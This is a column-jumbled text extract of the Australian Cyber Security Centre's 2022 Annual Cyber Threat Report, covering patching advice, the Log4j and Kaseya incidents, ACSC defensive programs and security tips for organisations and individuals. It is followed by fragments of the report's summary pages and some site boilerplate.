response initiatives Chief Information
to prevent potential Officers and industry
compromises. partners.
62
What you should do

Patching and uplifting networks
In the face of increasingly rapid critical vulnerabilities, services, which hold significant volumes of personal
applying patches to applications and operating information on clients.
systems has become even more essential. Once a In addition to rapid patching, organisations need
security vulnerability in an internet-facing service is to monitor for Indicators of Compromise, as
made public, it can be expected that malicious code compromise may have already occurred before the
will be developed by adversaries within 48 hours. release or application of patches. This is especially
There are cases in which adversaries have developed so for zero-day exploits—vulnerabilities which have
malicious code within hours of newly discovered been exploited before becoming publicly known. For
security vulnerabilities. The ACSC therefore instance, Log4j was first exploited at least 10 days
recommends patching internet-facing services within before being publicly disclosed.
48 hours if an exploit exists. More detailed advice is
available in the ACSC publication Assessing Security It is vital that patching is comprehensive, and legacy
Vulnerabilities and Applying Patches. assets are accounted for. Many organisations
struggle to maintain an accurate inventory of
Some sectors of the Australian economy have their ICT assets, and malicious actors know that
lagged in their patching rates. A limited analysis the easiest path to a target network is often
of patching rates following the 2021 Microsoft through unknown or abandoned ICT assets.
Exchange vulnerabilities, for instance, indicated that The ACSC recognises that some sectors have
the Professional, Scientific and Technical Services unique requirements, such as legacy operational
sector had the highest number of unpatched technology, and offers tailored uplift advice for such
Microsoft Exchange servers overall, with a rate of sectors.
unpatched servers significantly higher than its share
of the economy by number of businesses. This sector
includes industries such as legal and accounting
14 December 2021 15 December 2021 16–22 December 2021 23 December 2021

The ACSC published an The ACSC published a The ACSC published The ACSC published
updated Alert advising public technical Advisory. additional Alerts and an additional Alert,
the ACSC had observed Advisories, and public highlighting malicious
active exploitation of webinars. actors using Log4j for
this vulnerability within ransomware activities.
Australia.
63
Chapter 7
Cyber defence and resilience

■ Malicious actors are exploiting Australians’ desire for interconnected digital services.
■ Organisations can improve their cyber posture through implementing the Essential Eight.
■ Individuals should employ automatic updates and replace obsolete software and hardware.
Interconnectivity brings risks and

opportunities
The virtualisation of Australian life that accelerated during The blurring of work and home lives has made the
the coronavirus pandemic has become entrenched. Remote information held by individuals more valuable to malicious
working arrangements have given way to a hybrid working actors. Email accounts listed in PII holdings will almost
model, further increasing cyber security risks as employees certainly be under increased threat of spear phishing
switch regularly between personal and corporate devices. activity. The theft of PII creates a risk that ordinary
Australians will be victimised and need substantial support.
For example, small office/home office (SOHO) modems,
In some cases, a victim will be impacted for the rest of their
routers and network-attached storage are usually insecurely
life as exposure of their personal information, once leaked
designed with minimal security maintenance. SOHO routers
or sold, cannot necessarily be remediated.
are notorious for having insecure firmware, hardcoded
backdoors, and inconsistent patching. Even if secure patches As interconnectivity grows, malicious actors are increasingly
are available, individual users are highly unlikely to install looking to compromise multiple victims across a range of
them. And most SOHO routers manufactured before 2017 sectors via a single entry point. The ACSC expects this trend
have no ability to automatically update firmware. Meanwhile, to continue. For example, MSPs were targeted over
the Internet of Things is growing by billions of devices each 2021–22 as they are used by government, commercial
year and will introduce new types of vulnerabilities—for and not-for-profit businesses of all sizes, making them an
instance, in April 2022, researchers released a proof of attractive target for malicious actors. Malicious actors
concept for compromising smart speakers by having the increasingly view the supply chain as a priority target and a
device issue voice commands to itself. vector for compromise.
65
Case Study: Kaseya supply chain ransomware attack

In July 2021, US ICT management provider Kaseya became the victim of a sophisticated ransomware cyberattack, which
exploited a vulnerability in remote management software. This allowed the ransomware affiliate to carry out a supply chain
compromise of Kaseya’s customers. The cybercriminal group responsible demanded USD 70 million in Bitcoin for a universal
decryption key that would unlock customer data.
Kaseya responded by advising on-premises customers to shut down affected servers, and subsequently released a
compromise detection tool and software patches to customers. The company also warned of spammers exploiting the
incident by sending phishing emails that had fake notifications with malicious links.
Due to Kaseya’s swift response, the attack was contained to fewer than 60 MSPs of its more than 37,000 customers
worldwide, and between 800 and 1500 downstream customers, including 3 affected MSPs in Australia.
From 4 to 5 July 2021, the ACSC responded to a small number of cyber security incidents involving Australian entities affected
by the Kaseya software compromise, including businesses in the Education, Health, and Professional, Scientific and
Technical Services sectors. The ACSC also published an Advisory on the Kaseya ransomware attack.
On 22 July 2021, Kaseya obtained a universal decryption key to unlock its files and those of its customers, which allowed
Kaseya to restore functionality to all of its clients. Kaseya has stated publicly that it did not pay a ransom to the cybercrime
affiliate responsible for the attack. While interconnectivity introduces new risks, it also presents opportunities. Workplaces
have become more resilient through remote working arrangements and greater use of cloud services, reducing the risk of
single points of failure within in-house networks. Improved interconnectivity between government and industry is allowing
real-time sharing of threat intelligence, enabling organisations such as financial institutions to better protect PII.
66
What is the ACSC doing?

The ACSC is delivering a range of initiatives that streamline—and where possible, automate—active cyber defence and
intelligence sharing. REDSPICE will further strengthen Australia’s cyber defences.
ACSC initiative: CTIS

The CTIS service enables the sharing of cyber threat intelligence at machine speed. Through the use of automation,
participating entities receive cyber threat intelligence in a structured and timely manner.
The CTIS Data Model enables partners to share cyber threat intelligence through a common language and outlines
standards to share data in alignment to the 5 Cs: Content, Context, Clarity, Communication and Confidence.
On 1 November 2021, the bi-directional CTIS platform went live.
On 19 November 2021, the ACSC facilitated the first successful bi-directional share between a commercial entity (National
Australia Bank - NAB) and a Government department. Cyber Threat Intelligence shared by members via CTIS is made
available to other members in order to support the identification of malicious cyber activity in their environments. In one
instance, intelligence shared by NAB provided the means to identify suspicious cyber activity in an environment that ACSC
previously had no visibility of.
25,341 741 2,261

indicators have been provided by have been provided by CTIS have been shared with CTIS by
the ACSC, including from victims analysts working for ACSC’s ACSC Partners.
who are not ACSC Partners. delivery partner, Deloitte.
Following an early release to a sample-set of partners, CTIS was released broadly to ACSC network partners in June 2022.
67
ACSC initiative: Australian Protective Domain Name System

The Australian Protective Domain Name System (AUPDNS) is dedicated to protecting government networks. The system
uses verified threat intelligence to build a ‘block list’ of known malicious web domains.
Providing protection against malware, spyware phishing attacks, viruses, and malicious sites, AUPDNS monitors
connections between an organisation’s network and the internet. AUPDNS also stops malware already on devices from
‘calling home’, mitigating the damage from an attack. The information captured within AUPDNS also helps build the ACSC’s
cyber threat picture.
In the 2021–22 financial year, AUPDNS processed more than 36 billion queries, and blocked over 24 million domain requests.
AUPDNS onboarded 171 organisations, including a number of state and local government agencies.
ACSC initiative: Domain Takedown Service

In response to the increasing threat posed by domains hosting malicious software, the ACSC launched the Domain
Takedown Service pilot in 2021.
Upon detecting suspected malicious software, the service verifies maliciousness before issuing a takedown notification
request to the relevant Domain Host. The service also operates 10 ‘honeypot’ servers on Australian IP ranges, giving the
ACSC the ability to directly report malicious domains for manual verification and takedown. The service only targets those
attack types which fall under ASD’s cyber security function as per the Intelligence Services Act 2001.
In 2021–22, the service focused on 4 lines of effort:
Number of Number of Targeting success

Line of effort
notifications issued takedowns Rate
Government (Australian,
1,352 1,333 99%
state & territory, local)
Australian vaccine rollout 16,291 15,932 98%
Flubot text message

19,117 19,117 100%
malware
Brute force attacks against

29,446 29,278 99%
Australian servers
68
Uplifting an interconnected Australian

economy
Australia’s best defence in a rapidly evolving cyber threat The consequences for organisations which fail to manage
environment is to build resilience across businesses and cyber security incidents are clear. In May 2022, the
organisations, and among individuals. As vulnerabilities Federal Court of Australia found that financial planning
and interdependencies increase, preventative cyber security firm RI Advice had breached its financial services license
measures are not sufficient; organisations should also obligations by having inadequate cybersecurity risk
develop and test incident response, business continuity management systems. While the judgement does not
and disaster recovery plans. Commercial incident response set a legal standard for Australian Financial Services
providers have a particularly important role to play; they Licencees or other organisations, it is a strong reminder
offer services to organisations which may have limited in- that company boards should consider cyber resilience as
house capabilities, as well as reduce demand on the ACSC’s part of their statutory responsibilities. The ACSC publishes
finite incident response capabilities. The ACSC is conducting tailored advice for company boards, such as the January
a suite of incident response transformation activities to 2022 publication Log4j: What Boards and Directors Need
increase information sharing and reporting, while growing to Know. The ACSC also directly engages senior executives
the scale and maturity of commercial providers and the through the Joint Cyber Security Centres.
cyber security sector as a whole.
Case Study: Qantas

Qantas and the ACSC have been sharing knowledge for over 12 years. In 2015, Qantas was part of the Prime Minister’s
Incident Response Taskforce and has participated in multiple other exercises. The ACSC and Qantas now have information
exchange agreements and dedicated liaison personnel.
Qantas regularly checks with the ACSC to verify intelligence gathered from other sources, seeks advice on new and unusual
cyber security challenges, and seeks feedback on its incident response processes.
The ACSC also learns from Qantas. Qantas shares insights with ACSC analysts on how threat information and leads are
gathered and managed in the private sector. The ACSC, Qantas and other aviation sector partners are also members of the
Australian Aviation Cyber Council.
During 2021–22, the benefits of the partnership were demonstrated during Qanta’s involvement in the Australian
Government’s distribution of COVID-19 vaccines. It was in the national interest to ensure that the vaccine distribution
process was not interrupted by a cyberattack, and Qantas and the ACSC worked closely to make sure Qantas’s cyber
protections were fit for the task.
Qantas Group Chief Information Security Officer Jeffrey Choi stated, “My team continues to benefit from sharing knowledge
and expertise with the ACSC, as well as through forums with industry peers. ACSC’s Advisories and threat intelligence have
given the Qantas Group greater visibility of the threat landscape in which we operate”.
69
What can my organisation do?
Essential Eight private sectors to support and learn from each other.
ACSC Network Partners are provided access to threat
The Australian Cyber Security Centre (ACSC) has intelligence, news and advice to enhance situational
developed prioritised mitigation strategies—in the form of awareness; collaboration opportunities with fellow
the Strategies to Mitigate Cyber Security Incidents—to help cyber security professionals and resilience-building
organisations protect themselves against various activities (such as exercises, discussions, workshops).
cyber threats.
■ Business Partners – for businesses that would like
The Essential Eight Maturity Model, first published in June to be kept up to date with relevant cyber security
2017 and updated regularly, supports the implementation information for their businesses, including those
of the Essential Eight. It is based on the ACSC’s experience not eligible for the Network Partner tier. This tier of
in producing cyber threat intelligence, responding to cyber partnership provides organisations with a better
security incidents, conducting penetration testing and understanding of the cyber security landscape and
assisting organisations to implement the Essential Eight. outlines the steps required to protect themselves
from cyber security threats. They receive a
The Essential Eight remains highly relevant, with a subscription to the ACSC Alert Service and a monthly
major update released in July 2021. In recognition of the newsletter containing news, publications and
degrading cyber threat environment, in March 2022 the Advisories produced by the ACSC.
Attorney-General’s Department mandated the Essential
Eight for all non-corporate Commonwealth entities ■ Home Partners – for individuals and families that
through amendments to the Protective Security would like to be kept up to date with relevant
Policy Framework. information. ACSC Home Partners receive a
subscription to the ACSC Alert Service, providing
them with a better understanding of the cyber
Become an ACSC Partner security environment.
The ACSC Partnership Program facilitates ACSC

engagement with Australian organisations and Joint Cyber Security Centres
individuals to lift cyber resilience across the
The JCSCs support the Network Partner tier of the ACSC
Australian economy.
Partnership Program to bring together businesses and
The ACSC Partnership Program comprises 3 tiers to the research community, along with sAustralian, state
reach the entire Australian economy: and territory government agencies, in an open and
cooperative environment. JCSCs in Adelaide, Brisbane,
■ Network Partners – for organisations with Melbourne, Perth, Sydney and Hobart, along with a
responsibility for their own ICT environments, virtual JCSC in Darwin, provide opportunities for the
experts in cyber security such as academics, Australian cyber security community to come together in
and not-for-profit institutions. The community of a trusted, neutral environment to drive collaboration and
ACSC Network Partners includes cyber security information-sharing.
professionals across government, industry, and
academia. Bringing together the situational
awareness, technical expertise and experience of
this community allows the collective public and
Over the 2021–22 financial year, ACSC Network Partner membership has increased by 34 per cent, now
comprising over 2,300 partners. Business Partners increased by 65 per cent to over 3400 and Home Partners
by 8 per cent to over 82,000.
70
What can individuals do?

The risk of malicious cyber activity impacting Australian Individuals should also activate MFA, backup devices, set
individuals remains high. The ACSC provides easy steps secure passphrases and be alert for scams.
to secure your devices and accounts at cyber.gov.au,
Individuals interested in becoming an ACSC Home Partner
including step-by-step guides on how to enable
should register for the ACSC Alert Service.
multi-factor authentication (MFA) on popular social
networking applications.
Individuals are encouraged to patch or mitigate critical

vulnerabilities within 48 hours. Individuals should turn on
automatic updates on all devices and apps, including
personal mobile phones, computers and smart devices
such as smart speakers. Individuals should be aware that
many device manufacturers and software providers only
support updates for a limited number of years, and older
devices and software may have security vulnerabilities
that cannot be patched.
Patch within 48 Turn on

For advice, call the
hours automatic updates
Australian Cyber
Security Hotline
1300 CYBER1
(1300 292 371)
Activate MFA, backup devices, set secure

passphrases and be alert for scams
71
Notes
Sources
The ACSC manages or uses a number of unique datasets
to produce tailored advice and assistance for Australian
Government, organisations and the public. Data used
in this report have been extracted from live datasets of
cybercrime reports and cyber security incidents reported
to the ACSC. As such, the statistics and conclusions in this
report are based on point-in-time analysis and assessment.
Cybercrime and cyber security incidents reported to
the ACSC may not reflect all cyber threats and trends in
Australia’s cyber security environment.
The ACSC encourages the reporting of cyber security

incidents and cybercrimes to inform ACSC advice
and assistance to vulnerable organisations, and
enhance situational awareness of the national cyber
threat environment.
Glossary
The ACSC glossary provides definitions for terms used in this
Report and other ACSC publications.
Feedback
The ACSC welcomes feedback to improve the services it
provides to Australians. Feedback can be provided via our
feedback form, by emailing [email protected] or
by calling 1300 CYBER1 (1300 292 371).
73

Australia Annual Cyber Threat Report 2022 0

Uploaded by

Copyright:

Available Formats

Australia Annual Cyber Threat Report 2022 0

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Australia Annual Cyber Threat Report 2022 0

Uploaded by

Copyright:

Available Formats

July 2021 – June 2022

Annual Cyber Threat Report

About the ACSC

The Hon Richard Marles, MP

Cybercrime and cyber security incident statistics 20

Cyber defence and resilience 64

About the Contributors

Australian Signals Directorate

ASD delivers intelligence, cyber security and offensive operations in support of

Australian Criminal Intelligence Commission

Australian Federal Police

Australian Security Intelligence Organisation

The Defence Intelligence Organisation co-leads the ACSC’s Cyber Threat

Assessment team in partnership with ASD to provide the Australian Government

Department of Home Affairs

An increase in ﬁnancial losses due to BEC to

A rise in the average cost per cybercrime report to

A 25 per cent increase in the number of publicly reported

Over 76,000 cybercrime reports

What the ACSC saw:

A cybercrime report every 7 minutes on average

Over 25,000 calls to the Cyber Security Hotline

150,000 to 200,000 Small Ofﬁce/Home Ofﬁce routers

Fraud, online shopping and online banking

What the ACSC did

Responded to over 1,100

Blocked over 24 million malicious

Took down over 29,000 brute force attacks against

Took down over 15,000 domains hosting

Shared over 28,000 indicators of compromise with

What the ACSC did:

Collaborated with partners on 5 successful operations

Responded to 135 ransomware incidents

Notiﬁed 148 entities of ransomware activity on their

Conducted 49 high priority operational tasks in response

Published 49 Alerts and 14 Advisories on

What the ACSC did:

Issued an Advisory urging Australian organisations to

Briefed more than 200 government, business and critical

Published 13 new Step-by-Step Guides

Expanded the Partnership Program

What the ACSC did:

Led 24 cyber security exercises

Operationalised amendments to the Security of Critical

Notiﬁed 5 critical infrastructure entities of malicious cyber

Completed the Critical Infrastructure Uplift Program

What should individuals do?

Follow the ACSC’s easy steps to secure your devices and

Update your devices

Activate multi-factor authentication

Regularly backup your devices

Set secure passphrases

Watch out for scams

Sign-up to the ACSC’s free Alert Service

Report cybercrime to the ACSC

What should organisations do?

Review the cyber security posture of remote workers

Patch vulnerabilities within 48 hours.

Only use reputable cloud service providers and managed

Sign-up to become an ACSC partner

Cybercrime and cyber security incident statistics 20

Cyber defence and resilience 64